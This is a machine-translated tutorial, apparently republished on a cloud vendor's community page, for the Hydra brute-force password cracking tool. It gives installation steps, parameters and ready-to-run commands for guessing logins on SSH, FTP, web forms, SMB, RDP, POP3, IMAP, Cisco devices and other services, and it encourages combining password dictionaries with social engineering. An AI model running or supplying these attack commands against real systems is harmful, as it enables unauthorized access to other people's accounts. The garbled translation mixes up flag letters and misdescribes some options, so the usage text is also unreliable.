Hydra Password Cracking tool detailed

Source: Internet
Author: User
Tags imap install openssl nntp

First, Introduction

Hydra is a well-known hacker organization THC Open-source brute force password cracking tool, can hack a variety of passwords online. Official website: Http://www.thc.org/thc-hydra, can support AFP, Cisco AAA, Cisco Auth, Cisco Enable, CVS, Firebird, FTP, Http-form-get, http -form-post, Http-get, Http-head, Http-proxy, Https-form-get, Https-form-post, Https-get, HTTPS-HEAD, HTTP-PROXY, ICQ, IMAP, IRC, LDAP, Ms-sql, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, Pc-anywhere, PCNFS, POP3, POSTGRES, RDP, R exec, Rlogin, Rsh, Sap/r3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, TeamSpeak (TS2), Telnet, Vmware-auth, VNC and XMPP type passwords.

Second, installation

In the case of Debian and Ubuntu distributions, the source comes with Hydra, which is installed directly with Apt-get online:
sudo apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev hydra

Redhat/fedora release version of the download source package compiled installation, first install the relevant dependency package:
yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel Libssh-devel subversion-devel

hydra:http://www.thc.org/releases/ hydra-7.3.tar.gz

# tar zxvf hydra-7.0-src.tar.gz
# cd HYDRA-7.0-SRC
#./configure
# make
# Make install

Hydra supports GUI graphical interface, but the custom or command is useful.

Three, parameter description

Hydra [[[-L LOGIN|-L file] [-P pass|-p file] | [-c FILE]] [-e NS]
[-o file] [-t tasks] [-M file [-t tasks]] [-w time] [-f] [-s PORT] [-S] [-VV] Server service [OPT]
-R continue to crack from the last progress.
-S uses SSL links.
-S Port allows you to specify a nondefault port with this parameter.
-L LOGIN Specifies the cracked user to crack for a specific user. The
-l FILE Specifies the user name dictionary.
-P PASS lowercase, specify password cracking, less use, usually using a password dictionary.
-P FILE uppercase, specifying the password dictionary.
-e ns optional option, N: null password heuristic, s: Use specified user and password heuristics.
-C FILE uses a colon-delimited format, such as "Login name: password" instead of the-l/-p parameter. The
-m file specifies one line of destination list files.
-o file Specifies the result output file.
-F after using the-m parameter, the first login or password is found to abort the break. The number of threads running concurrently for
-T TASKS, which defaults to 16.
-W Time sets the maximum timeout, in seconds, which is 30s by default.
-V/-V displays detailed procedures.
Server Destination IP
Service Specifies the name, supported services and protocols: Telnet FTP POP3[-NTLM] IMAP[-NTLM] SMB smbnt Http-{head|get} http-{get|post}- Form http-proxy Cisco cisco-enable VNC ldap2 ldap3 MSSQL mysql oracle-listener postgres NNTP socks5 rexec rlogin PCNFS SNM P rsh CVs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak SIP VMAUTHD Firebird NCP AFP et cetera.
OPT-in options

Iv. Examples of usages

Simple demo:

Crack success, direct display of the results, the place to draw the red line is cracked out of the password, can also be output by parameter-O to the file. If the dictionary is strong enough to combine social workers, passwords don't take long to come out.

1, hack ssh:

Hydra-l user name-p password Dictionary-t thread-vv-e ns IP ssh
hydra-l user name-p password Dictionary-t thread-o SAVE.LOG-VV IP ssh< br>

2, hack ftp:

Hydra IP ftp-l user name-p password Dictionary-t thread (default)-VV
Hydra IP ftp-l user name-p password Dictionary-e ns-vv

3, get the way to commit, crack Web login:

Hydra-l user name-p password Dictionary-t thread-vv-e NS IP http-get/admin/
hydra-l username-P Secret Code Dictionary-T thread-vv-e ns-f IP http-get/admin/index.php

4, post submission, hack Web login:

Hydra-l user name-p password Dictionary-s IP http-post-form "/admin/login.php:username=^user^&password=^pass^&submit=login:sorry password"


hydra-t 3-l admin-p pass.txt-o out.txt-f 10.36.16.18 http-post-form "Login.php:id=^user^&pas Swd=^pass^:<title>wrong username or password</title> "

(parameter description:-T simultaneous thread count 3,-l username is admin, Dictionary pass.txt, Save as Out.txt,-f when cracked a password to stop, 10.36.16.18 target ip,http-post-form to crack is to use the HTTP POST way to submit form password cracking,<title> The content in the message is the return information hint that represents the error guess. )

5, crack https:

hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

6, Crack TeamSpeak:

hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

7. Crack Cisco:

hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

8, crack SMB:

hydra -l administrator -P pass.txt 10.36.16.18 smb

9, crack POP3:

hydra -l muts -P pass.txt my.pop3.mail pop3

10. Break RDP:

hydra ip rdp -l administrator -P pass.txt -V

11, Crack Http-proxy:

hydra -l admin -P pass.txt http-proxy://10.36.16.18

12. hack IMAP:

hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

Hydra Password Cracking tool detailed

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.